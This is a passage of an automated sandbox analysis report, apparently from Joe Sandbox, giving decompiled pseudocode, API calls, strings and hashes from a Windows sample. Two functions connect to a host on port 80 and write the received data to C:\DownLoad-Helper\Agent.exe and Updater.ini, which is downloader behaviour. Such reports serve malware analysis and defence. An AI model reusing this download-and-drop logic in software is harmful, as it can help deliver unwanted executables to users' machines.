				 *(_t188 + 0xbf0) = _t137;
				 *(_t188 + 0xbf4) = _t137;
				 *(_t188 + 0xbf8) = _t137;
				 *(_t188 + 0xc00) = _t137;
				SetRectEmpty(_t185);
				 *(_t188 + 0xc30) =  *(_t188 + 0xc30) & 0x00000000;
				 *(_t188 + 0xba4) =  *(_t188 + 0xba4) & 0x00000000;
				_t186 = _t185 | 0xffffffff;
				_t183 = 0x17;
				_t172 = 0x16;
				 *((intOrPtr*)(_t188 + 0xd0c)) = 0;
				 *((intOrPtr*)(_t188 + 0xba0)) = 0;
				 *((intOrPtr*)(_t188 + 0xb80)) = 0;
				 *((intOrPtr*)(_t188 + 0xb84)) = 0;
				 *((intOrPtr*)(_t188 + 0xd14)) = 0;
				 *((intOrPtr*)(_t188 + 0x134)) = 1;
				 *((intOrPtr*)(_t188 + 0x130)) = 1;
				_t141 = 0x10;
				 *(_t188 + 0xcf4) = _t186;
				 *(_t188 + 0xcf8) = _t186;
				 *((intOrPtr*)(_t188 + 0xc20)) = _t183;
				 *((intOrPtr*)(_t188 + 0xc24)) = _t172;
				 *((intOrPtr*)(_t188 + 0xc28)) = 1;
				 *((intOrPtr*)(_t188 + 0xc2c)) = 0xf;
				 *((intOrPtr*)(_t188 + 0xc10)) = _t183;
				 *((intOrPtr*)(_t188 + 0xc14)) = _t172;
				 *((intOrPtr*)(_t188 + 0xc18)) = _t141;
				 *((intOrPtr*)(_t188 + 0xc1c)) = 0xf;
				SetRectEmpty(_t156);
				 *(_t188 + 0xcfc) = _t186;
				 *((intOrPtr*)(_t188 + 0xc04)) = 0;
				 *((intOrPtr*)(_t188 + 0xd18)) = 0;
				 *((intOrPtr*)(_t188 + 0xbbc)) = 1;
				 *((intOrPtr*)(_t188 + 0xbc0)) = 1;
				 *((intOrPtr*)(_t188 + 0xb7c)) = 1;
				 *((intOrPtr*)(_t188 + 0xbb0)) = 1;
				 *((intOrPtr*)(_t188 + 0xbb4)) = 1;
				 *((intOrPtr*)(_t188 + 0xb94)) = 1;
				 *((intOrPtr*)(_t188 + 0xba8)) = 0;
				 *(_t188 + 0xd00) = _t186;
				 *((intOrPtr*)(_t188 + 0xd04)) = 0;
				 *((intOrPtr*)(_t188 + 0xd1c)) = 0;
				 *((intOrPtr*)(_t188 + 0xb78)) = 0;
				 *((intOrPtr*)(_t188 + 0xb88)) = 0;
				 *((intOrPtr*)(_t188 + 0xb8c)) = 0;
				 *((intOrPtr*)(_t188 + 0xbe8)) = 0;
				 *((intOrPtr*)(_t188 + 0xb90)) = 0;
				 *((intOrPtr*)(_t188 + 0xbfc)) = 0;
				 *((intOrPtr*)(_t188 + 0xc08)) = 0;
				 *((intOrPtr*)(_t188 + 0xc34)) = 0;
				 *((intOrPtr*)(_t188 + 0xc38)) = 0;
				 *((intOrPtr*)(_t188 + 0xbb8)) = 0;
				 *((intOrPtr*)(_t188 + 0xbcc)) = 0;
				 *((intOrPtr*)(_t188 + 0xbd0)) = 0;
				 *((intOrPtr*)(_t188 + 0xd10)) = 0;
				 *((intOrPtr*)(_t188 + 0xbd4)) = 0;
				 *((intOrPtr*)(_t188 + 0xbc8)) = 0;
				 *((intOrPtr*)(_t188 + 0xc0c)) = 0xfffffff6;
				 *((intOrPtr*)(_t188 + 0xb9c)) = 0;
				 *((intOrPtr*)(_t188 + 0xb98)) = 0;
				 *((intOrPtr*)(_t188 + 0xbd8)) = 0;
				 *((intOrPtr*)(_t188 + 0xbdc)) = 0;
				 *((intOrPtr*)(_t188 + 0xd08)) = 0;
				E00CDD388(0xe87460, _t193);
				E00CDD388(0xe87578, _t193);
				E00CDD388(0xe87690, _t193);
				E00CDD388(0xe877a8, _t193);
				E00CDD388(0xe878c0, _t193);
				E00CDD388(0xe879d8, _t193);
				E00CDD388(0xe87af0, _t193);
				E00CDD388(0xe87c08, _t193);
				return E00DDD4FA(_t188);
			}

0x00cee05d
0x00cee05d
0x00cee05d
0x00cee05d
0x00cee064
0x00cee069
0x00cee06b
0x00cee06e
0x00cee075
0x00cee081
0x00cee084
0x00cee08f
0x00cee093
0x00cee09e
0x00cee0a2
0x00cee0ad
0x00cee0b1
0x00cee0bc
0x00cee0c0
0x00cee0cb
0x00cee0cf
0x00cee0da
0x00cee0de
0x00cee0e9
0x00cee0ed
0x00cee0f8
0x00cee0fd
0x00cee103
0x00cee109
0x00cee10e
0x00cee11a
0x00cee120
0x00cee126
0x00cee12c
0x00cee132
0x00cee138
0x00cee13e
0x00cee146
0x00cee14a
0x00cee150
0x00cee156
0x00cee161
0x00cee167
0x00cee172
0x00cee178
0x00cee183
0x00cee187
0x00cee18c
0x00cee194
0x00cee196
0x00cee199
0x00cee19c
0x00cee19f
0x00cee1a5
0x00cee1a7
0x00cee1aa
0x00cee1ad
0x00cee1b0
0x00cee1b6
0x00cee1c0
0x00cee1cc
0x00cee1d4
0x00cee1da
0x00cee1e0
0x00cee1e5
0x00cee1e9
0x00cee1f5
0x00cee1f7
0x00cee1f7
0x00cee1fb
0x00cee1ff
0x00cee205
0x00cee20b
0x00cee211
0x00cee217
0x00cee21d
0x00cee223
0x00cee22c
0x00cee233
0x00cee238
0x00cee23b
0x00cee23c
0x00cee242
0x00cee248
0x00cee24e
0x00cee254
0x00cee25d
0x00cee263
0x00cee269
0x00cee26b
0x00cee271
0x00cee277
0x00cee27d
0x00cee283
0x00cee289
0x00cee293
0x00cee299
0x00cee29f
0x00cee2a5
0x00cee2af
0x00cee2b7
0x00cee2bf
0x00cee2c6
0x00cee2cc
0x00cee2d2
0x00cee2d8
0x00cee2de
0x00cee2e4
0x00cee2ea
0x00cee2f5
0x00cee2fb
0x00cee301
0x00cee307
0x00cee30d
0x00cee313
0x00cee319
0x00cee31f
0x00cee325
0x00cee32b
0x00cee331
0x00cee337
0x00cee33d
0x00cee343
0x00cee349
0x00cee34f
0x00cee355
0x00cee35b
0x00cee361
0x00cee367
0x00cee371
0x00cee377
0x00cee37d
0x00cee383
0x00cee389
0x00cee38f
0x00cee399
0x00cee3a3
0x00cee3ad
0x00cee3b7
0x00cee3c1
0x00cee3cb
0x00cee3d5
0x00cee3e1

APIs

__EH_prolog3.LIBCMT ref: 00CEE064

Part of subcall function 00CD9F7E: __EH_prolog3.LIBCMT ref: 00CD9F85

SetRectEmpty.USER32(?), ref: 00CEE21D
SetRectEmpty.USER32(?), ref: 00CEE2AF

Strings

xu, xrefs: 00CEE394
`t, xrefs: 00CEE2F0

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: EmptyH_prolog3Rect
String ID: `t$xu
API String ID: 1443337074-306704444
Opcode ID: 2f4284021f3a120844f777a26e8d5fe26ff731e90a6cfa96e2fd2681f7464f07
Instruction ID: 8dd9bdf51ec2d2a58a0f723b5db3fbeb06c1fba163953e0cfd23fa35bdb5f529
Opcode Fuzzy Hash: 2f4284021f3a120844f777a26e8d5fe26ff731e90a6cfa96e2fd2681f7464f07
Instruction Fuzzy Hash: 5AA1A2B0805B458EE364EFB9C191BDAFBE0BF49304F508A6ED1AE97281EB702544DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00CA5079 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00CA5079(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t98;
				void* _t114;
				intOrPtr _t115;
				void* _t118;
				void* _t128;
				void* _t131;
				void* _t135;
				void* _t148;
				intOrPtr _t152;
				intOrPtr _t157;
				void* _t158;
				void* _t162;

				_t162 = __eflags;
				_t148 = __edx;
				_push(0xe7c);
				E00DDD55F(0xe07d4c, __ebx, __edi, __esi);
				_t114 = __ecx;
				E00CA2C3F(_t158 - 0xe5c, __esi, E00CAA9F1());
				 *(_t158 - 4) =  *(_t158 - 4) & 0x00000000;
				E00CA2C3F(_t158 - 0xe60, __esi, E00CAA9F1());
				 *(_t158 - 4) = 1;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				E00DDFBE0(_t158 - 0x134, _t158 - 0x121, 0, 0xf1);
				E00DEAEC2(_t158 - 0x134, 0x104, "\\Agent.exe");
				_push(E00CA2DF6(_t158 - 0x134));
				E00CA2CD7(_t114, _t158 - 0xe5c, _t158 - 0x134, 0, _t158 - 0x134);
				E00CA68A8(_t158 - 0xe60, _t114);
				E00CA7572(_t158 - 0xe54);
				 *(_t158 - 4) = 2;
				E00CA2C3F(_t158 - 0xe58, 0, E00CAA9F1());
				 *(_t158 - 4) = 3;
				E00CA2C3F(_t158 - 0xe64, 0, E00CAA9F1());
				 *(_t158 - 4) = 4;
				_t151 =  *((intOrPtr*)(_t158 - 0xe60));
				E00CAAFE6(_t114,  *((intOrPtr*)(_t158 - 0xe60)), _t158 - 0xe74, _t158 - 0xe58, _t158 - 0xe64, _t158 - 0xe6c);
				E00CA7759(_t158 - 0xe54,  *((intOrPtr*)(_t158 - 0xe60)),  *((intOrPtr*)(_t158 - 0xe58)),  *((intOrPtr*)(_t158 - 0xe64)), _t158 - 0xe68);
				_t128 = _t158 - 0xe54;
				E00CA7606(_t128);
				_push(_t128);
				E00CA7685(_t114, _t158 - 0xe54, _t148,  *((intOrPtr*)(_t158 - 0xe58)));
				E00CA7951(_t158 - 0xe54, _t158 - 0xe54, _t158 - 0xe54);
				_t131 = _t158 - 0xe54;
				E00CA7A0F(_t131, _t158 - 0xe54, _t158 - 0xe54);
				_push(_t131);
				_push(_t158 - 0x30);
				_push(_t131);
				E00CA7AC7(_t114, _t158 - 0xe54,  *((intOrPtr*)(_t158 - 0xe60)), 0, _t162);
				_t115 = E00DE7BE1(_t158 - 0xe54, _t158 - 0x30);
				 *((intOrPtr*)(_t158 - 0xe70)) = 0;
				 *((intOrPtr*)(_t158 - 0xe68)) = _t115;
				E00CAB822(_t158 - 0xe88);
				 *(_t158 - 4) = 5;
				_t135 = _t158 - 0xe88;
				_t156 =  *((intOrPtr*)(_t158 - 0xe5c));
				E00CABE73(_t135, _t162,  *((intOrPtr*)(_t158 - 0xe5c)), 0x1001, 0);
				if(_t115 > 0) {
					_t152 =  *((intOrPtr*)(_t158 - 0xe70));
					_t157 = _t115;
					while(1) {
						GetTickCount();
						_push(_t135);
						_t118 = E00CA79A0(_t158 - 0xe54, _t158 - 0x534);
						if(_t118 == 0 || _t118 == 0xffffffff) {
							break;
						}
						GetTickCount();
						_t135 = _t158 - 0xe88;
						E00CAC1FE(_t118, _t135, _t158 - 0x534, _t118);
						_t152 = _t152 + _t118;
						if(_t152 < _t157) {
							continue;
						}
						break;
					}
					_t156 =  *((intOrPtr*)(_t158 - 0xe5c));
					_t151 =  *((intOrPtr*)(_t158 - 0xe60));
				}
				E00CABB76(_t158 - 0xe88);
				_t98 = E00DE6D4C(_t156, 0);
				E00CA2975(E00CA2975(E00CAB8A6(_t158 - 0xe88, _t148),  *((intOrPtr*)(_t158 - 0xe64)) - 0x10),  *((intOrPtr*)(_t158 - 0xe58)) - 0x10);
				E00CA2975(E00CA2975(E00CA75FB(_t158 - 0xe54), _t151 - 0x10), _t156 - 0x10);
				return E00DDD50E(0 | _t98 != 0xffffffff, _t151, _t156);
			}

0x00ca5079
0x00ca5079
0x00ca5079
0x00ca5083
0x00ca5088
0x00ca5096
0x00ca509b
0x00ca50ab
0x00ca50b0
0x00ca50ca
0x00ca50cb
0x00ca50cc
0x00ca50cd
0x00ca50ce
0x00ca50d0
0x00ca50d5
0x00ca50eb
0x00ca5105
0x00ca510d
0x00ca5119
0x00ca5124
0x00ca5129
0x00ca5139
0x00ca513e
0x00ca514e
0x00ca5159
0x00ca515d
0x00ca517a
0x00ca519b
0x00ca51a0
0x00ca51a6
0x00ca51ab
0x00ca51b8
0x00ca51c5
0x00ca51cc
0x00ca51d2
0x00ca51d7
0x00ca51db
0x00ca51dc
0x00ca51e3
0x00ca51f2
0x00ca51f4
0x00ca5200
0x00ca5206
0x00ca520c
0x00ca5210
0x00ca5216
0x00ca5222
0x00ca5229
0x00ca522b
0x00ca5231
0x00ca5233
0x00ca5233
0x00ca5239
0x00ca524c
0x00ca5250
0x00000000
0x00000000
0x00ca5257
0x00ca5265
0x00ca526b
0x00ca5270
0x00ca5274
0x00000000
0x00000000
0x00000000
0x00ca5274
0x00ca5276
0x00ca527c
0x00ca527c
0x00ca5288
0x00ca5290
0x00ca52c1
0x00ca52dc
0x00ca52e8

APIs

__EH_prolog3_GS.LIBCMT ref: 00CA5083

Part of subcall function 00CA7606: WSAStartup.WS2_32(00000202,?), ref: 00CA7637
Part of subcall function 00CA7606: getprotobyname.WS2_32(tcp), ref: 00CA7642
Part of subcall function 00CA7606: WSAGetLastError.WS2_32 ref: 00CA764A
Part of subcall function 00CA7606: socket.WS2_32(00000002,00000001,?), ref: 00CA7659

Part of subcall function 00CA7685: gethostbyname.WS2_32(?), ref: 00CA76BD
Part of subcall function 00CA7685: htons.WS2_32(00000050), ref: 00CA76E8
Part of subcall function 00CA7685: connect.WS2_32(?,?,00000010), ref: 00CA7734

Part of subcall function 00CA7951: send.WS2_32(?,?,?,00000000), ref: 00CA797D

Part of subcall function 00CA7A0F: setsockopt.WS2_32(?,0000FFFF,00001006,?,00000004), ref: 00CA7A30

Part of subcall function 00CA7AC7: __EH_prolog3.LIBCMT ref: 00CA7ACE

Part of subcall function 00CABE73: _strlen.LIBCMT ref: 00CABEFB

GetTickCount.KERNEL32 ref: 00CA5233
GetTickCount.KERNEL32 ref: 00CA5257

Part of subcall function 00CAC1FE: WriteFile.KERNEL32(?,?,?,00000004,00000000,00000000,00000400,?,?,00CA74BE,?,00000000,?,00000000,?,00000400), ref: 00CAC21B
Part of subcall function 00CAC1FE: GetLastError.KERNEL32(00000000,?,00CA74BE,?,00000000,?,00000000,?,00000400,00000000,00000000,?,?,00CA7D3B,?), ref: 00CAC228

Strings

\Agent.exe, xrefs: 00CA50DA
C:\DownLoad-Helper, xrefs: 00CA50BA

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: CountErrorLastTick$FileH_prolog3H_prolog3_StartupWrite_strlenconnectgethostbynamegetprotobynamehtonssendsetsockoptsocket
String ID: C:\DownLoad-Helper$\Agent.exe
API String ID: 257963179-3256139770
Opcode ID: 7c3d19634f9987ada83847b182481db4d4c5ebbd487ae5d7706d5067b0b293b2
Instruction ID: bc9dc983c6c51176acb2a14635800d7b9922ead199fc9ac0e8c776d5391b7cdf
Opcode Fuzzy Hash: 7c3d19634f9987ada83847b182481db4d4c5ebbd487ae5d7706d5067b0b293b2
Instruction Fuzzy Hash: A45183728045AA9BCB25FB64CD92EDEB338AF15709F0409D9B50972092DFB16F88DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00CA55D3 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00CA55D3(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t98;
				void* _t114;
				intOrPtr _t115;
				void* _t118;
				void* _t128;
				void* _t131;
				void* _t135;
				void* _t148;
				intOrPtr _t152;
				intOrPtr _t157;
				void* _t158;
				void* _t162;

				_t162 = __eflags;
				_t148 = __edx;
				_push(0xe7c);
				E00DDD55F(0xe07d4c, __ebx, __edi, __esi);
				_t114 = __ecx;
				E00CA2C3F(_t158 - 0xe5c, __esi, E00CAA9F1());
				 *(_t158 - 4) =  *(_t158 - 4) & 0x00000000;
				E00CA2C3F(_t158 - 0xe60, __esi, E00CAA9F1());
				 *(_t158 - 4) = 1;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				E00DDFBE0(_t158 - 0x134, _t158 - 0x121, 0, 0xf1);
				E00DEAEC2(_t158 - 0x134, 0x104, "\\Updater.ini");
				_push(E00CA2DF6(_t158 - 0x134));
				E00CA2CD7(_t114, _t158 - 0xe5c, _t158 - 0x134, 0, _t158 - 0x134);
				E00CA68A8(_t158 - 0xe60, _t114);
				E00CA7572(_t158 - 0xe54);
				 *(_t158 - 4) = 2;
				E00CA2C3F(_t158 - 0xe58, 0, E00CAA9F1());
				 *(_t158 - 4) = 3;
				E00CA2C3F(_t158 - 0xe64, 0, E00CAA9F1());
				 *(_t158 - 4) = 4;
				_t151 =  *((intOrPtr*)(_t158 - 0xe60));
				E00CAAFE6(_t114,  *((intOrPtr*)(_t158 - 0xe60)), _t158 - 0xe74, _t158 - 0xe58, _t158 - 0xe64, _t158 - 0xe6c);
				E00CA7759(_t158 - 0xe54,  *((intOrPtr*)(_t158 - 0xe60)),  *((intOrPtr*)(_t158 - 0xe58)),  *((intOrPtr*)(_t158 - 0xe64)), _t158 - 0xe68);
				_t128 = _t158 - 0xe54;
				E00CA7606(_t128);
				_push(_t128);
				E00CA7685(_t114, _t158 - 0xe54, _t148,  *((intOrPtr*)(_t158 - 0xe58)));
				E00CA7951(_t158 - 0xe54, _t158 - 0xe54, _t158 - 0xe54);
				_t131 = _t158 - 0xe54;
				E00CA7A0F(_t131, _t158 - 0xe54, _t158 - 0xe54);
				_push(_t131);
				_push(_t158 - 0x30);
				_push(_t131);
				E00CA7AC7(_t114, _t158 - 0xe54,  *((intOrPtr*)(_t158 - 0xe60)), 0, _t162);
				_t115 = E00DE7BE1(_t158 - 0xe54, _t158 - 0x30);
				 *((intOrPtr*)(_t158 - 0xe70)) = 0;
				 *((intOrPtr*)(_t158 - 0xe68)) = _t115;
				E00CAB822(_t158 - 0xe88);
				 *(_t158 - 4) = 5;
				_t135 = _t158 - 0xe88;
				_t156 =  *((intOrPtr*)(_t158 - 0xe5c));
				E00CABE73(_t135, _t162,  *((intOrPtr*)(_t158 - 0xe5c)), 0x1001, 0);
				if(_t115 > 0) {
					_t152 =  *((intOrPtr*)(_t158 - 0xe70));
					_t157 = _t115;
					while(1) {
						GetTickCount();
						_push(_t135);
						_t118 = E00CA79A0(_t158 - 0xe54, _t158 - 0x534);
						if(_t118 == 0 || _t118 == 0xffffffff) {
							break;
						}
						GetTickCount();
						_t135 = _t158 - 0xe88;
						E00CAC1FE(_t118, _t135, _t158 - 0x534, _t118);
						_t152 = _t152 + _t118;
						if(_t152 < _t157) {
							continue;
						}
						break;
					}
					_t156 =  *((intOrPtr*)(_t158 - 0xe5c));
					_t151 =  *((intOrPtr*)(_t158 - 0xe60));
				}
				E00CABB76(_t158 - 0xe88);
				_t98 = E00DE6D4C(_t156, 0);
				E00CA2975(E00CA2975(E00CAB8A6(_t158 - 0xe88, _t148),  *((intOrPtr*)(_t158 - 0xe64)) - 0x10),  *((intOrPtr*)(_t158 - 0xe58)) - 0x10);
				E00CA2975(E00CA2975(E00CA75FB(_t158 - 0xe54), _t151 - 0x10), _t156 - 0x10);
				return E00DDD50E(0 | _t98 != 0xffffffff, _t151, _t156);
			}

0x00ca55d3
0x00ca55d3
0x00ca55d3
0x00ca55dd
0x00ca55e2
0x00ca55f0
0x00ca55f5
0x00ca5605
0x00ca560a
0x00ca5624
0x00ca5625
0x00ca5626
0x00ca5627
0x00ca5628
0x00ca562a
0x00ca562f
0x00ca5645
0x00ca565f
0x00ca5667
0x00ca5673
0x00ca567e
0x00ca5683
0x00ca5693
0x00ca5698
0x00ca56a8
0x00ca56b3
0x00ca56b7
0x00ca56d4
0x00ca56f5
0x00ca56fa
0x00ca5700
0x00ca5705
0x00ca5712
0x00ca571f
0x00ca5726
0x00ca572c
0x00ca5731
0x00ca5735
0x00ca5736
0x00ca573d
0x00ca574c
0x00ca574e
0x00ca575a
0x00ca5760
0x00ca5766
0x00ca576a
0x00ca5770
0x00ca577c
0x00ca5783
0x00ca5785
0x00ca578b
0x00ca578d
0x00ca578d
0x00ca5793
0x00ca57a6
0x00ca57aa
0x00000000
0x00000000
0x00ca57b1
0x00ca57bf
0x00ca57c5
0x00ca57ca
0x00ca57ce
0x00000000
0x00000000
0x00000000
0x00ca57ce
0x00ca57d0
0x00ca57d6
0x00ca57d6
0x00ca57e2
0x00ca57ea
0x00ca581b
0x00ca5836
0x00ca5842

APIs

__EH_prolog3_GS.LIBCMT ref: 00CA55DD

Part of subcall function 00CA7606: WSAStartup.WS2_32(00000202,?), ref: 00CA7637
Part of subcall function 00CA7606: getprotobyname.WS2_32(tcp), ref: 00CA7642
Part of subcall function 00CA7606: WSAGetLastError.WS2_32 ref: 00CA764A
Part of subcall function 00CA7606: socket.WS2_32(00000002,00000001,?), ref: 00CA7659

Part of subcall function 00CA7685: gethostbyname.WS2_32(?), ref: 00CA76BD
Part of subcall function 00CA7685: htons.WS2_32(00000050), ref: 00CA76E8
Part of subcall function 00CA7685: connect.WS2_32(?,?,00000010), ref: 00CA7734

Part of subcall function 00CA7951: send.WS2_32(?,?,?,00000000), ref: 00CA797D

Part of subcall function 00CA7A0F: setsockopt.WS2_32(?,0000FFFF,00001006,?,00000004), ref: 00CA7A30

Part of subcall function 00CA7AC7: __EH_prolog3.LIBCMT ref: 00CA7ACE

Part of subcall function 00CABE73: _strlen.LIBCMT ref: 00CABEFB

GetTickCount.KERNEL32 ref: 00CA578D
GetTickCount.KERNEL32 ref: 00CA57B1

Part of subcall function 00CAC1FE: WriteFile.KERNEL32(?,?,?,00000004,00000000,00000000,00000400,?,?,00CA74BE,?,00000000,?,00000000,?,00000400), ref: 00CAC21B
Part of subcall function 00CAC1FE: GetLastError.KERNEL32(00000000,?,00CA74BE,?,00000000,?,00000000,?,00000400,00000000,00000000,?,?,00CA7D3B,?), ref: 00CAC228

Strings

\Updater.ini, xrefs: 00CA5634
C:\DownLoad-Helper, xrefs: 00CA5614

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: CountErrorLastTick$FileH_prolog3H_prolog3_StartupWrite_strlenconnectgethostbynamegetprotobynamehtonssendsetsockoptsocket
String ID: C:\DownLoad-Helper$\Updater.ini
API String ID: 257963179-2120342276
Opcode ID: 87ea914869cbf2115c74a527485136ef18c73b95fc6c90009958957f26394a4b
Instruction ID: ed628fe2c0e7d069c88bddd764568a6a665d335e02ad12dd0d37ef0e4ea18cc8
Opcode Fuzzy Hash: 87ea914869cbf2115c74a527485136ef18c73b95fc6c90009958957f26394a4b
Instruction Fuzzy Hash: 5C5193728045AA9BCB25FB64CD92EDEB338AF15709F0009D9B50972092DFB16F88DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00CC2684 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00CC2684(void** __ecx, signed int _a4, short _a8) {
				signed int _v8;
				short _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				char* _v88;
				short* _v92;
				signed int _v96;
				intOrPtr _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t53;
				void* _t56;
				int _t65;
				intOrPtr _t66;
				signed int _t67;
				void* _t69;
				void* _t82;
				void** _t85;
				short* _t92;
				signed int _t97;
				signed int _t105;
				signed int* _t106;
				char* _t107;
				signed int _t108;
				signed int _t109;
				signed int _t110;
				void* _t111;

				_t53 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t53 ^ _t110;
				_t85 = __ecx;
				_v84 = _a4;
				if(__ecx[1] == 0) {
					L20:
					_t56 = 0;
				} else {
					_t106 = GlobalLock( *__ecx);
					_t108 = _t106[0] & 0x0000ffff;
					_v96 = _t108;
					_v80 = E00CC2669(_t106);
					_t9 = _t108 == 0xffff;
					_v88 = 2 + (0 | _t9) * 4;
					if(_t9 != 0) {
						 *_t106 =  *_t106 | 0x00000040;
					} else {
						_t106[3] = _t106[3] | 0x00000040;
					}
					_t107 = _v84;
					if(_t107 == 0 || E00DEC1A0(_t107) < 0x20) {
						_t65 = MultiByteToWideChar(0, 0, _t107, 0xffffffff,  &_v72, 0x20);
						_t107 = _v88;
						_t66 = _t65 + _t65;
						_v100 = _t66;
						_t67 = _t66 + _t107;
						_v76 = _t67;
						if(_t67 < _t107) {
							goto L20;
						} else {
							_t92 = E00CC2528(_t106);
							_v92 = _t92;
							if(_v80 == 0) {
								_t69 = 0;
							} else {
								_t82 = _t92 + _t107;
								if(_t82 != 0) {
									_t82 = E00DEB04D(_t82);
									_t92 = _v92;
								}
								_t69 = _t107 + (_t82 + 1) * 2;
							}
							_t27 = _t92 + 3; // 0x3
							_v84 = _t27 + _t69 & 0xfffffffc;
							_t105 = _v76;
							_v80 = _t92 + 0x00000003 + _t105 & 0xfffffffc;
							if(_v96 != 0xffff) {
								_t109 = _t106[2] & 0x0000ffff;
							} else {
								_t109 = _t106[4] & 0x0000ffff;
							}
							_t97 = _v80;
							_t101 = _v84;
							_v76 = _t109;
							_t107 = _v88;
							if(_t105 == _t69 || _v76 <= 0) {
								L19:
								_t101 =  &_v72;
								 *_v92 = _a8;
								E00CA5028(_t85, _v92, _t106, _v92 + _t107, _v100,  &_v72, _v100);
								_t85[1] = _t85[1] + _v80 - _v84;
								GlobalUnlock( *_t85);
								_t85[2] = _t85[2] & 0x00000000;
								_t56 = 1;
							} else {
								_t80 = _t85[1] - _t101 + _t106;
								if(_t85[1] - _t101 + _t106 > _t85[1]) {
									goto L20;
								} else {
									E00CA5028(_t85, _t97, _t106, _t97, _t80, _t101, _t80);
									_t111 = _t111 + 0x10;
									goto L19;
								}
							}
						}
					} else {
						goto L20;
					}
				}
				return E00DDCBCE(_t56, _t85, _v8 ^ _t110, _t101, _t106, _t107);
			}

0x00cc268a
0x00cc2691
0x00cc2698
0x00cc269a
0x00cc26a3
0x00cc27ea
0x00cc27ea
0x00cc26a9
0x00cc26b1
0x00cc26b4
0x00cc26ba
0x00cc26c3
0x00cc26d0
0x00cc26da
0x00cc26dd
0x00cc26e5
0x00cc26df
0x00cc26df
0x00cc26df
0x00cc26e8
0x00cc26ed
0x00cc270c
0x00cc2712
0x00cc2715
0x00cc2717
0x00cc271a
0x00cc271c
0x00cc2721
0x00000000
0x00cc2727
0x00cc2732
0x00cc2734
0x00cc2737
0x00cc2752
0x00cc2739
0x00cc2739
0x00cc273e
0x00cc2741
0x00cc2747
0x00cc2747
0x00cc274d
0x00cc274d
0x00cc2754
0x00cc275f
0x00cc2762
0x00cc276a
0x00cc2776
0x00cc277e
0x00cc2778
0x00cc2778
0x00cc2778
0x00cc2782
0x00cc2787
0x00cc278a
0x00cc278d
0x00cc2790
0x00cc27b1
0x00cc27b4
0x00cc27bb
0x00cc27c8
0x00cc27d6
0x00cc27db
0x00cc27e1
0x00cc27e7
0x00cc2799
0x00cc279e
0x00cc27a3
0x00000000
0x00cc27a5
0x00cc27a9
0x00cc27ae
0x00000000
0x00cc27ae
0x00cc27a3
0x00cc2790
0x00000000
0x00000000
0x00000000
0x00cc26ed
0x00cc27fa

APIs

GlobalLock.KERNEL32 ref: 00CC26AB
_strlen.LIBCMT ref: 00CC26F0
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00CC270C
GlobalUnlock.KERNEL32(?), ref: 00CC27DB

Strings

System, xrefs: 00CC2697

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
